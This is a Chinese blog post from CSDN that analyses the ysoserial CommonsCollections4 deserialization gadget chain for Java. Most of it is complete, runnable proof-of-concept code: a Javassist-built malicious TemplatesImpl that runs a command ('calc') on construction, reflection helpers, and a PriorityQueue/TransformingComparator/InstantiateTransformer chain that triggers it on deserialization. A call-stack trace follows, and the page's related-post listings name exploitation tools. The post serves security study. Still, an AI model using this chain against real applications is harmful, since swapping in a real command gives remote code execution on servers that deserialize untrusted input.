『Java安全』反序列化-CC4反序列化漏洞POP链分析_ysoserial CommonsCollections4 PoC分析

已于 2022-03-12 20:55:32 修改
阅读量1k 收藏 1
点赞数
分类专栏: # CommonsCollestions cc链 文章标签: java安全 cc4 web安全 ysoserial 反序列化
于 2022-03-12 20:53:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Xxy605/article/details/123448990
版权

文章目录

前言

同样的,CC4是CC2的变种,改变同CC3用的是InstantiateTransformer而不是InvokerTransformer触发

需要Commons-Collections4 4.0

代码复现

工具类

生成恶意TemplatesImpl:

TemplatesGeneratorPacked/GetAbstractTranslet.java

package TemplatesGeneratorPacked;

import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import javassist.*;

public class GetAbstractTranslet {
    public static byte[] generate() throws Exception{
        ClassPool pool = ClassPool.getDefault();
        CtClass clazz = pool.makeClass("e");
        CtClass zuper = pool.get(AbstractTranslet.class.getName());
        clazz.setSuperclass(zuper);

        CtConstructor constructor = new CtConstructor(new CtClass[]{}, clazz);
        constructor.setBody("{Runtime.getRuntime().exec(\"calc\");}");
        clazz.addConstructor(constructor);

        return clazz.toBytecode();
    }
}

TemplatesGeneratorPacked/GetTemplatesImpl.java

package TemplatesGeneratorPacked;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import ReflectPacked.ValueGetterSetter;

public class GetTemplatesImpl {
    public static TemplatesImpl getTemplatesImpl() throws Exception{
        byte[][] bytes = new byte[][]{GetAbstractTranslet.generate()};

        TemplatesImpl templates = TemplatesImpl.class.newInstance();
        ValueGetterSetter.setValue(templates, "_bytecodes", bytes);
        ValueGetterSetter.setValue(templates, "_name", "a");
        ValueGetterSetter.setValue(templates, "_tfactory", new TransformerFactoryImpl());

        return  templates;
    }
}

反射get/set:

ReflectPacked/ValueGetterSetter.java

package ReflectPacked;

import java.lang.reflect.Field;

public class ValueGetterSetter {
    public static void setValue(Object obj, String name, Object value) throws Exception{
        Field field = obj.getClass().getDeclaredField(name);
        field.setAccessible(true);
        field.set(obj, value);
    }

    public static Object getValue(Object obj, String name) throws Exception{
        Field field = obj.getClass().getDeclaredField(name);
        field.setAccessible(true);
        return field.get(obj);
    }
}

反序列化:

UnserializePacked.Unserialize.java

package UnserializePacked;

import java.io.*;

public class Unserialize {
    public static void unserialize(Object obj) throws Exception{
        File f = File.createTempFile("temp", "out");

        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream(f));
        oos.writeObject(obj);
        oos.close();

        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(f));
        Object o = ois.readObject();
        System.out.println(o);
        ois.close();

        f.deleteOnExit();
    }
}

PoC

package cc.cc4;

import ReflectPacked.ValueGetterSetter;
import TemplatesGeneratorPacked.GetTemplatesImpl;
import UnserializePacked.Unserialize;

import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InstantiateTransformer;

import javax.xml.transform.Templates;
import java.util.PriorityQueue;

public class PoC {
    public static void main(String[] args) throws Exception {
        Templates templates = GetTemplatesImpl.getTemplatesImpl();

        ConstantTransformer constantTransformer = new ConstantTransformer(String.class);
        InstantiateTransformer instantiateTransformer = new InstantiateTransformer(
                new Class[]{String.class},
                new Object[]{"a"}
        );

        ChainedTransformer chainedTransformer = new ChainedTransformer(
                constantTransformer,
                instantiateTransformer);

        TransformingComparator comparator = new TransformingComparator(chainedTransformer);

        PriorityQueue queue = new PriorityQueue(2, comparator);
        queue.add(1);
        queue.add(1);

        ValueGetterSetter.setValue(constantTransformer, "iConstant", TrAXFilter.class);
        ValueGetterSetter.setValue(instantiateTransformer, "iParamTypes", new Class[]{Templates.class});
        ValueGetterSetter.setValue(instantiateTransformer, "iArgs", new Object[]{templates});

        Unserialize.unserialize(queue);
    }
}

代码审计 | 原理分析

思路是CC2和CC3的结合,这里只梳理流程

『Java安全』反序列化-CC2反序列化漏洞POP链分析_ysoserial CommonsCollections2 PoC分析
『Java安全』反序列化-CC3反序列化漏洞POP链分析_ysoserial CommonsCollections3 PoC分析

1. TrAXFilter构造器传入TemplatesImpl会调用newTransformer()

2. InstantiateTransformer.transform()调用指定的类构造器

3. TransformingComparator.compare()调用this.transformer.transform()

4. PriorityQueue反序列化调用comparator.compare()

POP链

newTransformer:439, TemplatesImpl (com.sun.org.apache.xalan.internal.xsltc.trax)
<init>:64, TrAXFilter (com.sun.org.apache.xalan.internal.xsltc.trax)
newInstance0:-1, NativeConstructorAccessorImpl (sun.reflect)
newInstance:57, NativeConstructorAccessorImpl (sun.reflect)
newInstance:45, DelegatingConstructorAccessorImpl (sun.reflect)
newInstance:526, Constructor (java.lang.reflect)
transform:116, InstantiateTransformer (org.apache.commons.collections4.functors)
transform:32, InstantiateTransformer (org.apache.commons.collections4.functors)
transform:112, ChainedTransformer (org.apache.commons.collections4.functors)
compare:81, TransformingComparator (org.apache.commons.collections4.comparators)
siftDownUsingComparator:699, PriorityQueue (java.util)
siftDown:667, PriorityQueue (java.util)
heapify:713, PriorityQueue (java.util)
readObject:773, PriorityQueue (java.util)
invoke0:-1, NativeMethodAccessorImpl (sun.reflect)
invoke:57, NativeMethodAccessorImpl (sun.reflect)
invoke:43, DelegatingMethodAccessorImpl (sun.reflect)
invoke:606, Method (java.lang.reflect)
invokeReadObject:1017, ObjectStreamClass (java.io)
readSerialData:1893, ObjectInputStream (java.io)
readOrdinaryObject:1798, ObjectInputStream (java.io)
readObject0:1350, ObjectInputStream (java.io)
readObject:370, ObjectInputStream (java.io)
unserialize:14, Unserialize (UnserializePacked)
main:40, PoC (cc.cc4)

欢迎关注我的CSDN博客 :@Ho1aAs
版权属于:Ho1aAs
本文链接:https://blog.csdn.net/Xxy605/article/details/123448990
版权声明:本文为原创,转载时须注明出处及本声明

Ho1aAs
关注
专栏目录
commons-collections4-4.1
11-01
commons-collections4-4.1,用来修复java反序列漏洞,重命名后替换之前Middleware\modules下的的3.2.0版
Java反序列化(四)——CC4、CC2
最新发布
Xzy03210321的博客
08-15 776
最近比较忙,CC5和CC7先不写了,写一篇大半天。引用我老学长John的图。
Java安全学习笔记--反序列化漏洞利用链CC4
m0_64685672的博客
01-20 1599
测试环境 jdk1.8(jdk8u71) Commons Collections4.0 基于cc2和cc3,由于TransformingComparator+priorityqueue是可以触发transforme()方法所以可以利用这个两个类的组合来代替cc3链中的LazyMap或Transformedmmap+AnnotationinvocationHandler的组合,从而构成了cc4。 恶意类 import com.sun.org.apache.xalan.int...
Java反序列化 CC4利用链记录
LTianHang的博客
02-07 236
Java反序列化 CC4利用链记录
Java 反序列化漏洞-Apache Commons Collections4-TreeBag攻击链
cjdgg的博客
10-06 1412
知识点补充可以看看我前面写的CC2和CC3CC4这条链其实是CC2的变种,与CC2不同的是和CC3一样用了InstantiateTransformer而不是InvokerTransformer触发利用链,ysoserial中用 PriorityQueue 的 TransformingComparator 触发 ChainedTransformer,再利用 InstantiateTransformer 实例化 TemplatesImpl。
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
Java反序列化漏洞是软件安全领域的一个重要话题,特别是在企业级应用服务器如Weblogic中,这类漏洞可能导致远程代码执行、系统权限提升等严重后果。工具"Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查...
java反序列化漏洞-验证.rar
06-25
标签“java反序列化漏洞 java反序列化 java反序列化漏洞-验证方法”进一步强调了本主题的焦点。这些标签表明该资源涵盖了从基础概念到具体验证方法的全面讨论,包括: 1. **Java反序列化漏洞**:当不信任的数据源...
基于 Java 的亿赛通电子文档安全管理系统XStream反序列化漏洞任意文件上传利用
07-01
【作品名称】:基于 Java 的亿赛通电子文档安全管理系统XStream反序列化漏洞任意文件上传利用 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期...
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen
11-05
在提到的 "shiro_attack_by J1anfen" 工具中,重点是针对 Apache Shiro 的一个特定安全问题:反序列化漏洞反序列化漏洞通常出现在程序中,当接收到从网络或持久存储中读取的数据,并将其转换回原来的对象实例时...
Java反序列化漏洞静态分析与动态验证研究与实现
04-10
在当今互联网应用日益广泛的背景下,Java作为广泛使用的一种编程语言,其类库数量的增长随之带来了一个显著的问题:Java反序列化漏洞的数量和种类正在急剧增加。这类漏洞通常被攻击者用作攻击媒介,与任意命令漏洞...
commons-collections4-4.1.jar
08-14
java读取excel2007解决org.apache.commons.collections找不到的问题。
commons-collections-3.2.2、4-4.1
11-07
修复weblogic反序列化漏洞,修复方法为:替换原来的common-collections组件,建议:原来是3.2.d就替换为3.2.2,原来是4.x,就替换为4.4.1,如果出现不兼容,则替换一个版本试试。 1.先停止weblogic 2.替换oracle\modules目录里的com.bean.core.apache.commons.collections_x.x.x.jar 3.启动weblogic
commons-collections4-4.1-API文档-中文版.zip
07-03
赠送jar包:commons-collections4-4.1.jar; 赠送原API文档:commons-collections4-4.1-javadoc.jar; 赠送源代码:commons-collections4-4.1-sources.jar; 赠送Maven依赖信息文件:commons-collections4-4.1.pom; 包含翻译后的API文档:commons-collections4-4.1-javadoc-API文档-中文(简体)版.zip; Maven坐标:org.apache.commons:commons-collections4:4.1; 标签:apache、commonscollections4、中文文档、jar包、java; 使用方法:解压翻译后的API文档,用浏览器打开“index.html”文件,即可纵览文档内容。 人性化翻译,文档中的代码和结构保持不变,注释和说明精准翻译,请放心使用。
java反序列化漏洞利用工具WebLogicExploit_weblogic图形化漏洞利用工具
09-01
使用注意: 1. WebLogic反弹需要等5秒左右 2. 该工具为对外测试版,请尽量按照正常思路来用,... 4. jboss回显执行命令部分利用异常抛出机制,本地(4.2.3.GA)测试成功,其他版本请自测 5. 体积更小,不再依赖java
Java安全CommonsCollections4
顶峰
01-09 1525
这次给大家带来的是CC4链的简单分析,可以看到CC4链还是没有脱离之前跟的链的影子,我们可以看到CC3的前半部分以及CC2的后半部分,需要注意的问题的话就是版本问题了吧还有上面提到的一些小细节,至此CC链就快跟完了。
[Java反序列化]—CommonsCollections4
snowlyzz的博客
11-26 629
CC4分析
Java反序列化漏洞——CommonsCollections4.0版本—CC2、CC4
Thunderclap的博客
02-18 1685
因为这条利⽤链中的关键类org.apache.commons.collections4.comparators.TransformingComparator ,在commonscollections4.0以前是版本中是没有实现Serializable 接⼝的,⽆法在序列化中使⽤。实际上是可用的,比如CC6的链,引入的时候因为⽼的Gadget中依赖的包名都是org.apache.commons.collections ,⽽新的包名已经变。其他的代码不需要改变,即可创建出新版本下的利用链。
Java与Jackson反序列化漏洞深度解析
"深入解析JAVA及Jackson反序列化漏洞" 本文主要探讨了Java和Jackson库的反序列化原理,以及相关的安全问题。Java反序列化是一个关键的编程概念,它允许将对象的状态转换为字节流,以便存储或在网络中传输,然后在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值